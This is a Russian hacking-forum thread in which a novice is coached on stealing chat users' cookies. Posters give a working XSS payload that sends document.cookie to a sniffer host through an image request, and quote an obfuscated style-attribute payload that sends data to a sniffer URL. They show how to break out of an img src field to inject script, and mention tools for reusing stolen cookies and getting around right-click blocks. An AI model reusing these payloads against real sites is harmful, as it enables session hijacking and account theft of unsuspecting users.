Народ помогите! Со снифером! почему когда я оставляю ссылку на снивер и ктонить на ней кликнет то в логе вот такая ЖОПА:


[Sun Mar 26 15:35:10 2006] IP=89.54.80.70 SITE=
REFERER=
QUERY=MT=1
AGENT=

[Sun Mar 26 15:33:56 2006] IP=207.46.98.148 SITE=
REFERER=
QUERY=
AGENT=msnbot/1.0 (+http://search.msn.com/msnbot.htm)

Никаких куков ГДЕ ОНИ куда пропали!?!?!?!? :confused: :confused: :confused:
ИЛИ я чет нитак делаю помогите плиз!

ты забыл document.cookie

может даже у чела оутпост стоит и перекрывает рефер

ты забыл document.cookie
Я просто новичек в этом деле :) Че это такое document.cookie??? :confused:

<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>

<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>Но насколько я знаю такой скрипт подходит не для всех ЧАТОВ! или я ОШИБАЮСЬ? Если он для всех то где его тогда нужно писать? :confused:

Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!

К примеру можешь писать в поле ник или цвет

Оставить ссылку на сниффер не достаточно.. Нужно сначало найти уязвимость, хсс в данному случае, а тогда уже внедрять ссылку на сниффер с кражой куков. А то, что они просто кликнут на линк, кроме айпи, тебе больше ничего не даст.

2 Автар А как же у тебя логи снифер пишет, если ты не знаешь куда вставлять скрипт???

Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!
А как научится определять XSS

Я качал я VIDEO.ANTICHAT.RU ролики и там вот напримере muz-tv_chat-xss чувак пишет:

В поле "О себе"
' style='background:url(javascript:document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg?/.sourse.replace(/x/g,String.fromCharcode(47))+opener.location)' s

ОТКУДА ОН ВАЩЕ ЭТО ВЗЯЛ? Откуда узнал что это сработает?

исходный код посмотри и всё поймёшь...

исходный код посмотри и всё поймёшь...
Код чего :confused: сайта :confused:

akep']Код чего :confused: сайта :confused:
html код страницы куда впихнётся твой код с xss из поля "О себе" "

html код страницы куда впихнётся твой код с xss из поля "О себе" "
ты конечно извини за мою надоедливость но вот еще тебе вопросик: Как понять можно ли туда его запихнуть или нельзя? Что для этого нужно знать?

p.s. SORRI народ вы не думайте что я ламер но просто мне хочется узнать чуть больше обо всем этом!!! И к томуже вы тоже у когото этому научились :) так помогите и мне :)

Хм... Почитай статьи на ачате про взлом чатов... Тебе станет немного понятней, что это =)

http://antichat.ru/crackchat/index.html
http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll

Поищи в интернете в гугле www.google.com мануалы по XSS что да как и всё поймёш....

ПАСИБ! :) А что надо знать чтобы этим заниматся :confused:

http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll
http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html

это так к слову... :D


собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:

<img src="http://url_фотки/nax.jpg">
там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...

собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:

<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>">
я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!

дальше работает знание и воображение :D

http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss

а чтобы понимать xss нужно знание html и javascript

http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html

это так к слову... :D


собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:

<img src="http://url_фотки/nax.jpg">
там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...

собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:

<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>">
я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!

дальше работает знание и воображение :D

http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss

а чтобы понимать xss нужно знание html и javascript

БОЛЬШОЕ ПИСИБО!!! У меня вопросик к тебе ышо один будет! :) ты знаешь какиенить ресерсы на которых можно подробно узнать о html и javascript?
А то в i-nete много таких а толку от них 0. Напиши если знаешь! Буду очень признателен:)

http://www.yandex.ru/yandsearch?rpt=rad&text=%F3%F7%E5%E1%ED%E8%EA+html
http://www.yandex.ru/yandsearch?text=%F3%F7%E5%E1%ED%E8%EA+javascript&stype=www

ПАСИБ буду учить! Читать! :) :) :)

Мдя а сам найти не мог книги???

НАРОД! У мну вопросик!
Вот допустим есть чат на котором можно воткнуть картинку но только загрузкой с компа!
Внимание вопрос:
Можноли использовать это для того чтобы запустить СНИФЕР :confused:

Я тк думую эта фишка почти во всех чатах и сней не запустиш снифер.

а если допусим я получил куки! а в чите скрипт отключающий правую кнопку мыши, его можно какнить обойти :confused:

А зачем тебе вообше правая конпка ?

А зачем тебе вообше правая конпка ?
ну чтобы воспользоватся IE_XSS_Kit

народ а какие еще можно использовать программы кроме IE_XSS_Kit :confused: